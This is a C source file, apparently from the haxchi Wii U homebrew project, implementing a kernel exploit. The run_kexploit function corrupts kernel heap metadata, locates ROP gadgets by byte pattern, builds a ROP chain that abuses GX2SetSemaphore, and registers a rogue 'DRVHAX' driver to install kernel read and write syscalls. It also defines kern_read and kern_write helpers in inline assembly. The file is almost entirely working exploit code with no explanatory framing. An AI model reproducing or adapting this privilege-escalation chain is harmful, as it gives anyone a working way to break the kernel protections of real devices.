mirror of
https://github.com/wiiu-env/haxchi.git
synced 2024-11-05 08:15:06 +01:00
255 lines
9.1 KiB
C
255 lines
9.1 KiB
C
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#include "kexploit.h"
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#include "coreinit.h"
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void wait(unsigned int coreinit_handle, unsigned int t);
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void doBrowserShutdown(unsigned int coreinit_handle);
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void setupOSScreen(unsigned int coreinit_handle);
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void printOSScreenMsg(unsigned int coreinit_handle, char *buf,unsigned int pos);
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void exitOSScreen(unsigned int coreinit_handle);
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void callSysExit(unsigned int coreinit_handle, void *sysFunc);
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/* Initial setup code stolen from Pong, makes race much more reliable */
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void run_kexploit(private_data_t *private_data)
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{
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/* Get a handle to coreinit.rpl and gx2.rpl */
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unsigned int coreinit_handle = private_data->coreinit_handle;
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unsigned int gx2_handle = 0;
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OSDynLoad_Acquire("gx2.rpl", &gx2_handle);
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/* Exit functions */
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void (*__PPCExit)();
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void (*_Exit)(int);
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OSDynLoad_FindExport(coreinit_handle, 0, "__PPCExit", &__PPCExit);
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OSDynLoad_FindExport(coreinit_handle, 0, "_Exit", &_Exit);
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/* Memory functions */
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void (*DCFlushRange)(void *buffer, uint32_t length);
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void (*DCInvalidateRange)(void *buffer, uint32_t length);
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void (*DCTouchRange)(void *buffer, uint32_t length);
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uint32_t (*OSEffectiveToPhysical)(void *vaddr);
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void* (*OSAllocFromSystem)(uint32_t size, int align);
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void (*OSFreeToSystem)(void *ptr);
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OSDynLoad_FindExport(coreinit_handle, 0, "DCFlushRange", &DCFlushRange);
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OSDynLoad_FindExport(coreinit_handle, 0, "DCInvalidateRange", &DCInvalidateRange);
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OSDynLoad_FindExport(coreinit_handle, 0, "DCTouchRange", &DCTouchRange);
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OSDynLoad_FindExport(coreinit_handle, 0, "OSEffectiveToPhysical", &OSEffectiveToPhysical);
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OSDynLoad_FindExport(coreinit_handle, 0, "OSAllocFromSystem", &OSAllocFromSystem);
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OSDynLoad_FindExport(coreinit_handle, 0, "OSFreeToSystem", &OSFreeToSystem);
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/* OS thread functions */
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bool (*OSCreateThread)(void *thread, void *entry, int argc, void *args, uint32_t stack, uint32_t stack_size, int priority, uint16_t attr);
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int (*OSResumeThread)(void *thread);
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void (*OSExitThread)();
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int (*OSIsThreadTerminated)(void *thread);
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void (*OSYieldThread)(void);
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OSDynLoad_FindExport(coreinit_handle, 0, "OSCreateThread", &OSCreateThread);
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OSDynLoad_FindExport(coreinit_handle, 0, "OSResumeThread", &OSResumeThread);
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OSDynLoad_FindExport(coreinit_handle, 0, "OSExitThread", &OSExitThread);
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OSDynLoad_FindExport(coreinit_handle, 0, "OSIsThreadTerminated", &OSIsThreadTerminated);
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OSDynLoad_FindExport(coreinit_handle, 0, "OSYieldThread", &OSYieldThread);
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/* OSDriver functions */
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uint32_t reg[] = {0x38003200, 0x44000002, 0x4E800020};
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uint32_t (*Register)(char *driver_name, uint32_t name_length, void *buf1, void *buf2) = find_gadget(reg, 0xc, (uint32_t) __PPCExit);
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uint32_t dereg[] = {0x38003300, 0x44000002, 0x4E800020};
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uint32_t (*Deregister)(char *driver_name, uint32_t name_length) = find_gadget(dereg, 0xc, (uint32_t) __PPCExit);
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uint32_t copyfrom[] = {0x38004700, 0x44000002, 0x4E800020};
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uint32_t (*CopyFromSaveArea)(char *driver_name, uint32_t name_length, void *buffer, uint32_t length) = find_gadget(copyfrom, 0xc, (uint32_t) __PPCExit);
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uint32_t copyto[] = {0x38004800, 0x44000002, 0x4E800020};
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uint32_t (*CopyToSaveArea)(char *driver_name, uint32_t name_length, void *buffer, uint32_t length) = find_gadget(copyto, 0xc, (uint32_t) __PPCExit);
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/* GX2 functions */
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void (*GX2SetSemaphore)(uint64_t *sem, int action);
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void (*GX2Init)(void *arg);
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void (*GX2Shutdown)(void);
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OSDynLoad_FindExport(gx2_handle, 0, "GX2SetSemaphore", &GX2SetSemaphore);
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OSDynLoad_FindExport(gx2_handle, 0, "GX2Init", &GX2Init);
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OSDynLoad_FindExport(gx2_handle, 0, "GX2Shutdown", &GX2Shutdown);
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/* Init GX2 again */
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GX2Init((void*)0);
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/* Allocate space for DRVHAX */
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uint32_t *drvhax = OSAllocFromSystem(0x4c, 4);
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/* Set the kernel heap metadata entry */
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uint32_t *metadata = (uint32_t*) (KERN_HEAP + METADATA_OFFSET + (0x02000000 * METADATA_SIZE));
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metadata[0] = (uint32_t)drvhax;
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metadata[1] = (uint32_t)-0x4c;
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metadata[2] = (uint32_t)-1;
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metadata[3] = (uint32_t)-1;
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/* Find some gadgets */
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uint32_t gx2data[] = {0xFC2A0000};
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uint32_t gx2data_addr = (uint32_t) find_gadget(gx2data, 0x04, 0x10000000);
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uint32_t r3r4load[] = {0x80610008, 0x8081000C, 0x80010014, 0x7C0803A6, 0x38210010, 0x4E800020};
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uint32_t r3r4load_addr = (uint32_t) find_gadget(r3r4load, 0x18, 0x01000000);
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uint32_t r30r31load[] = {0x80010014, 0x83e1000c, 0x7c0803a6, 0x83c10008, 0x38210010, 0x4e800020};
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uint32_t r30r31load_addr = (uint32_t) find_gadget(r30r31load, 0x18, 0x01000000);
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uint32_t doflush[] = {0xba810008, 0x8001003c, 0x7c0803a6, 0x38210038, 0x4e800020, 0x9421ffe0, 0xbf61000c, 0x7c0802a6, 0x7c7e1b78, 0x7c9f2378, 0x90010024};
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uint32_t doflush_addr = (uint32_t) find_gadget(doflush, 0x2C, 0x01000000) + 0x14 + 0x18;
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uint32_t gx2rop[] = {0x819A0004, 0x55800036, 0x7C006040, 0x40820054, 0x2C190000, 0x4182004C, 0x2C1F0000, 0x40820044, 0x2C1D0000, 0x4182003C, 0x2C1E0000};
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uint32_t gx2rop_addr = (uint32_t) find_gadget(gx2rop, 0x2C, 0x01000000);
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/* Modify a next ptr on the heap */
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uint32_t kpaddr = KERN_HEAP_PHYS + STARTID_OFFSET;
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/* Make a thread to modify the semaphore */
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OSContext *thread = (OSContext*)private_data->MEMAllocFromDefaultHeapEx(0x1000, 8);
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uint32_t *stack = (uint32_t*)private_data->MEMAllocFromDefaultHeapEx(0xA0, 0x20);
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if (!OSCreateThread(thread, (void*)gx2rop_addr, 0, NULL, ((uint32_t)stack) + 0xA0, 0xA0, 0, 0x1 | 0x8)) OSFatal("Failed to create thread");
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/* Set up the ROP chain */
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thread->gpr[1] = (uint32_t)stack;
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thread->gpr[3] = kpaddr;
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thread->gpr[30] = gx2data_addr;
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thread->gpr[31] = 1;
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thread->srr0 = ((uint32_t)GX2SetSemaphore) + 0x2C;
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stack[0x24/4] = r30r31load_addr; /* Load r30/r31 - stack=0x20 */
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stack[0x28/4] = gx2data_addr; /* r30 = GX2 data area */
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stack[0x2c/4] = 1; /* r31 = 1 (signal) */
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stack[0x34/4] = r3r4load_addr; /* Load r3/r4 - stack=0x30 */
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stack[0x38/4] = kpaddr;
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stack[0x44/4] = ((uint32_t)GX2SetSemaphore) + 0x2C; /* GX2SetSemaphore() - stack=0x40 */
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stack[0x64/4] = r30r31load_addr; /* Load r30/r31 - stack=0x60 */
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stack[0x68/4] = 0x100; /* r30 = r3 of do_flush = 0x100 */
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stack[0x6c/4] = 1; /* r31 = r4 of do_flush = 1 */
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stack[0x74/4] = doflush_addr; /* do_flush() - stack=0x70 */
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stack[0x94/4] = (uint32_t)OSExitThread;
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DCFlushRange(thread, 0x1000);
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DCFlushRange(stack, 0x1000);
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/* Start the thread */
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OSResumeThread(thread);
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/* Wait for a while */
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while(OSIsThreadTerminated(thread) == 0)
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{
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OSYieldThread();
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}
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/* Free stuff */
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private_data->MEMFreeToDefaultHeap(thread);
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private_data->MEMFreeToDefaultHeap(stack);
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/* Register a new OSDriver, DRVHAX */
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char drvname[6] = {'D', 'R', 'V', 'H', 'A', 'X'};
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Register(drvname, 6, NULL, NULL);
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/* Modify its save area to point to the kernel syscall table */
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drvhax[0x44/4] = KERN_SYSCALL_TBL_2 + (0x34 * 4);
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/* Use DRVHAX to install the read and write syscalls */
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uint32_t syscalls[2] = {KERN_CODE_READ, KERN_CODE_WRITE};
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CopyToSaveArea(drvname, 6, syscalls, 8);
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/* Clean up the heap and driver list so we can exit */
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kern_write((void*)(KERN_HEAP + STARTID_OFFSET), 0);
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kern_write((void*)KERN_DRVPTR, drvhax[0x48/4]);
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/* Shut down GX2 again */
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GX2Shutdown();
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}
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/* Simple memcmp() implementation */
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int memcmp(void *ptr1, void *ptr2, uint32_t length)
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{
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uint8_t *check1 = (uint8_t*) ptr1;
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uint8_t *check2 = (uint8_t*) ptr2;
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uint32_t i;
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for (i = 0; i < length; i++)
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{
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if (check1[i] != check2[i]) return 1;
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}
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return 0;
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}
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void* memcpy(void* dst, const void* src, uint32_t size)
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{
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uint32_t i;
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for (i = 0; i < size; i++)
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((uint8_t*) dst)[i] = ((const uint8_t*) src)[i];
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return dst;
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}
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/* Find a gadget based on a sequence of words */
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void *find_gadget(uint32_t code[], uint32_t length, uint32_t gadgets_start)
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{
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uint32_t *ptr;
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/* Search code before JIT area first */
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for (ptr = (uint32_t*) gadgets_start; ptr != (uint32_t*) JIT_ADDRESS; ptr++)
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{
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if (!memcmp(ptr, &code[0], length)) return ptr;
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}
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/* Restart search after JIT */
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for (ptr = (uint32_t*) CODE_ADDRESS_START; ptr != (uint32_t*) CODE_ADDRESS_END; ptr++)
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{
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if (!memcmp(ptr, &code[0], length)) return ptr;
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}
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OSFatal("Gadget not found!");
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return (void*)0;
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}
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/* Read a 32-bit word with kernel permissions */
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uint32_t __attribute__ ((noinline)) kern_read(const void *addr)
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{
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uint32_t result;
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asm volatile (
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"li 3,1\n"
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"li 4,0\n"
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"li 5,0\n"
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"li 6,0\n"
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"li 7,0\n"
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"lis 8,1\n"
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"mr 9,%1\n"
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"li 0,0x3400\n"
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"mr %0,1\n"
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"sc\n"
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"nop\n"
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"mr 1,%0\n"
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"mr %0,3\n"
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: "=r"(result)
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: "b"(addr)
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: "memory", "ctr", "lr", "0", "3", "4", "5", "6", "7", "8", "9", "10",
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"11", "12"
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);
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return result;
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}
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/* Write a 32-bit word with kernel permissions */
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void __attribute__ ((noinline)) kern_write(void *addr, uint32_t value)
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{
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asm volatile (
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"li 3,1\n"
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"li 4,0\n"
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"mr 5,%1\n"
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"li 6,0\n"
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"li 7,0\n"
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"lis 8,1\n"
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"mr 9,%0\n"
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"mr %1,1\n"
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"li 0,0x3500\n"
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"sc\n"
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"nop\n"
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"mr 1,%1\n"
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:
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: "r"(addr), "r"(value)
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: "memory", "ctr", "lr", "0", "3", "4", "5", "6", "7", "8", "9", "10",
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"11", "12"
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);
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}
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